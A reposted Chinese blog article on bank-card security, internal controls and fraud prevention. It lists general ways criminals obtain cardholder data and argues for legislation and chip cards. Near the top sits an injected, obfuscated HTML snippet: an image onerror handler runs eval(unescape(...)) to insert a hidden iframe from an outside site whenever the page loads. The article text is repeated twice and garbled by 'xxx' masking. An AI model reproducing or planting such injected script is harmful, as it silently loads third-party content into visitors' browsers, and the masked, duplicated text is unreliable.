xxx内控和风险防范
[转贴 2010-01-31 16:28:46]
xxx内控和风险防范
![]()
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zf_200_200.html%20width%3D200%20height%3D200%20frameBorder%3D0%20scrolling%3Dno%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml1%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">
目前,国际上xxx金融犯罪日益猖獗,犯罪分子利用各种手段窃取用户资料,利用伪造卡进行诈骗的犯罪案件正在加速增长。2003年2月,美国惊爆xxx客户资料失窃案,约800万张xxx客户资料被盗,其中资金损失尚无法预测。在我国,随着电子银行业务的快速发展,各种相关诉讼和xxx犯罪案件也直线上升。全国范围内xxx犯罪所造成的直接损失,目前尚无确切统计,仅我国台湾地区去年由于xxx犯罪所造成的损失已高达几十亿元;今年10月份一个假期内,台湾就发生257起xxx犯罪案件,被xx金额达3牞000多万元新台币。 据了解,我国目前大约有xxx5亿张,5万台ATM机,50余万台POS机,平均年xx量增长64%,交易量年增长76%。有各种迹象表明,在我国利用xxx进行的犯罪的活动逐步进入高发阶段。所以,从银行内部对xxx保密技术、内控制度和客户端两个方面着手,加强xxx保密工作,遏制利用xxx犯罪,已经刻不容缓。xxx保密安全问题涉及银行内部和客户端两个层次 xxx保密主要涉及两个层次的安全问题:{dy}层次是银行内部系统对xxx的技术安全保障和银行内控制度对xxx客户信息保密的措施;第二层次是xxx客户端对卡载体和卡信息的安全保密工作。可见,如何确保xxx保密,应当从银行内部和客户两个层次考虑问题,无论立法或者设定银行规章,还是强化某些技术保障措施,两个层次都不可以偏废。 犯罪分子获取xxx客户信息的经常手段 犯罪分子利用xxx犯罪的方法有多种多样,但从普遍性来看,犯罪分子都要首先获取客户的银行资料。发达国家xxx犯罪呈高科技化发展,而国内犯罪分子获取xxx客户资料的手段虽然多种多样,但目前基本上还处于比较原始型的传统犯罪阶段,主要归类为以下方式: (一)在特定场所贴通知或告示,假借银行的名义,非法获取客户的xxx资料; (二)利用某些客户对ATM机操作不熟练,借助提供帮助的过程,要求xxx客户尽快与银行管理员联系等方式,获取客户的银行资料; (三)利用外接装置xxx吞卡,等客户离开后获得客户的xxx; (四)利用安装的感应设备、监控设备或肉眼观察方法进行隐蔽窥视,非法获取用户的密码资料; (五)在键盘输入设备里非法安装密码接收设备,获取客户的密码; (六)xxxx客户的银行资料; (七)破译客户随意丢弃的资料,获取客户的xxx信息; (八)在持卡人使用过的网吧电脑或公用电话上回查有关资料,获取xxx信息; (九)餐馆、商场的个别工作人员与犯罪分子勾结,在客户持卡消费时,利用盗码器窃取客户的xxx账户信息和密码; (十)计算机黑客通过攻击网上银行系统,获取xxx客户信息。 从上述犯罪手段可以看出,为有效预防犯罪分子窃取xxx客户信息进行犯罪,对犯罪分子通过原始犯罪手段和高科技犯罪手段来实施犯罪所采取的防范措施必须并举考虑,缺一不可。而xxx客户资金和信息的失窃往往与系统安全观念落实不到位、例行维护制度实施不力、法律法规保障缺乏,甚至互联网与电子商务的普及速度加快等因素,都可能成为未来银行信用卡的安全隐患。 加强xxx保密的立法和改进xxx保密技术 解决xxx的保密问题应当首先从立法上抓起,要通过立法来强化各商业银行的保密义务和保密意识: 首先,应当尽快出台xxx条例,系统地规范商业银行在采用和管理xxx方面的具体义务和工作职责,促使其在追求xxx所带来经济效益的同时,还要切实注意xxx的安全性,树立起对自己乃至对客户的资金高度负责的精神,从其内部制度控制风险防范措施到技改投入等方面均做出安排和采取有效措施。确保xxx保密工作得以落实,是监管机关所应开展的首要工作。 其次,在立法上确保xxx的安全技术和保密制度的完善。具体措施包括强调商业银行在提高xxx的防伪技术指标、研究开xx片和机具安全性能等方面加大投入,保障xxx信息的技术安全;要求商业银行具有符合xxx业务发展需求的技术人员和管理人员牷要求商业银行具有符合xxx业务需求的资金清算系统;要求xx银行应当与xxx收单行、经营xxx业务的特约商户等签订客户信息保密协议;要求xxx客户使用密码和签名或身份证件;规定银行必须做出安排确保客户对所属xxx随时封存、挂失和查询,并减少封存实施要素;而监管机关也应当建立和健全对商业银行有关制度建设和工作情况纠察的监管机制等。 第三,在技术措施上,商业银行应当引入高新技术手段和措施,应对xxx金融犯罪。目前xxx犯罪问题的关键是磁条卡技术的缺陷。犯罪分子可以通过简单的设备xx磁条卡上的资料,再复制到新的卡片上,窃取客户资金。因此,全球性的解决方案是用智能卡取代磁条卡,并逐步采用安全性更高的识别技术和系统,以达到新的数据加密技术和智能卡标准。而在自助柜员机安装芯片卡读卡器,可以从控制安全程序和收单系统验证等方面,提高xxx的安全性。 2003年12月19日
目前,国际上xxx金融犯罪日益猖獗,犯罪分子利用各种手段窃取用户资料,利用伪造卡进行诈骗的犯罪案件正在加速增长。2003年2月,美国惊爆xxx客户资料失窃案,约800万张xxx客户资料被盗,其中资金损失尚无法预测。在我国,随着电子银行业务的快速发展,各种相关诉讼和xxx犯罪案件也直线上升。全国范围内xxx犯罪所造成的直接损失,目前尚无确切统计,仅我国台湾地区去年由于xxx犯罪所造成的损失已高达几十亿元;今年10月份一个假期内,台湾就发生257起xxx犯罪案件,被xx金额达3牞000多万元新台币。 据了解,我国目前大约有xxx5亿张,5万台ATM机,50余万台POS机,平均年xx量增长64%,交易量年增长76%。有各种迹象表明,在我国利用xxx进行的犯罪的活动逐步进入高发阶段。所以,从银行内部对xxx保密技术、内控制度和客户端两个方面着手,加强xxx保密工作,遏制利用xxx犯罪,已经刻不容缓。xxx保密安全问题涉及银行内部和客户端两个层次 xxx保密主要涉及两个层次的安全问题:{dy}层次是银行内部系统对xxx的技术安全保障和银行内控制度对xxx客户信息保密的措施;第二层次是xxx客户端对卡载体和卡信息的安全保密工作。可见,如何确保xxx保密,应当从银行内部和客户两个层次考虑问题,无论立法或者设定银行规章,还是强化某些技术保障措施,两个层次都不可以偏废。 犯罪分子获取xxx客户信息的经常手段 犯罪分子利用xxx犯罪的方法有多种多样,但从普遍性来看,犯罪分子都要首先获取客户的银行资料。发达国家xxx犯罪呈高科技化发展,而国内犯罪分子获取xxx客户资料的手段虽然多种多样,但目前基本上还处于比较原始型的传统犯罪阶段,主要归类为以下方式: (一)在特定场所贴通知或告示,假借银行的名义,非法获取客户的xxx资料; (二)利用某些客户对ATM机操作不熟练,借助提供帮助的过程,要求xxx客户尽快与银行管理员联系等方式,获取客户的银行资料; (三)利用外接装置xxx吞卡,等客户离开后获得客户的xxx; (四)利用安装的感应设备、监控设备或肉眼观察方法进行隐蔽窥视,非法获取用户的密码资料; (五)在键盘输入设备里非法安装密码接收设备,获取客户的密码; (六)xxxx客户的银行资料; (七)破译客户随意丢弃的资料,获取客户的xxx信息; (八)在持卡人使用过的网吧电脑或公用电话上回查有关资料,获取xxx信息; (九)餐馆、商场的个别工作人员与犯罪分子勾结,在客户持卡消费时,利用盗码器窃取客户的xxx账户信息和密码; (十)计算机黑客通过攻击网上银行系统,获取xxx客户信息。 从上述犯罪手段可以看出,为有效预防犯罪分子窃取xxx客户信息进行犯罪,对犯罪分子通过原始犯罪手段和高科技犯罪手段来实施犯罪所采取的防范措施必须并举考虑,缺一不可。而xxx客户资金和信息的失窃往往与系统安全观念落实不到位、例行维护制度实施不力、法律法规保障缺乏,甚至互联网与电子商务的普及速度加快等因素,都可能成为未来银行信用卡的安全隐患。 加强xxx保密的立法和改进xxx保密技术 解决xxx的保密问题应当首先从立法上抓起,要通过立法来强化各商业银行的保密义务和保密意识: 首先,应当尽快出台xxx条例,系统地规范商业银行在采用和管理xxx方面的具体义务和工作职责,促使其在追求xxx所带来经济效益的同时,还要切实注意xxx的安全性,树立起对自己乃至对客户的资金高度负责的精神,从其内部制度控制风险防范措施到技改投入等方面均做出安排和采取有效措施。确保xxx保密工作得以落实,是监管机关所应开展的首要工作。 其次,在立法上确保xxx的安全技术和保密制度的完善。具体措施包括强调商业银行在提高xxx的防伪技术指标、研究开xx片和机具安全性能等方面加大投入,保障xxx信息的技术安全;要求商业银行具有符合xxx业务发展需求的技术人员和管理人员牷要求商业银行具有符合xxx业务需求的资金清算系统;要求xx银行应当与xxx收单行、经营xxx业务的特约商户等签订客户信息保密协议;要求xxx客户使用密码和签名或身份证件;规定银行必须做出安排确保客户对所属xxx随时封存、挂失和查询,并减少封存实施要素;而监管机关也应当建立和健全对商业银行有关制度建设和工作情况纠察的监管机制等。 第三,在技术措施上,商业银行应当引入高新技术手段和措施,应对xxx金融犯罪。目前xxx犯罪问题的关键是磁条卡技术的缺陷。犯罪分子可以通过简单的设备xx磁条卡上的资料,再复制到新的卡片上,窃取客户资金。因此,全球性的解决方案是用智能卡取代磁条卡,并逐步采用安全性更高的识别技术和系统,以达到新的数据加密技术和智能卡标准。而在自助柜员机安装芯片卡读卡器,可以从控制安全程序和收单系统验证等方面,提高xxx的安全性。 2003年12月19日
浏览空间
郑重声明:资讯 【xxx内控和风险防范- 信用卡- howler - 和讯博客】由 发布,版权归原作者及其所在单位,其原创性以及文中陈述文字和内容未经(企业库qiyeku.com)证实,请读者仅作参考,并请自行核实相关内容。若本文有侵犯到您的版权, 请你提供相关证明及申请并与我们联系(qiyeku # qq.com)或【在线投诉】,我们审核后将会尽快处理。
—— 相关资讯 ——
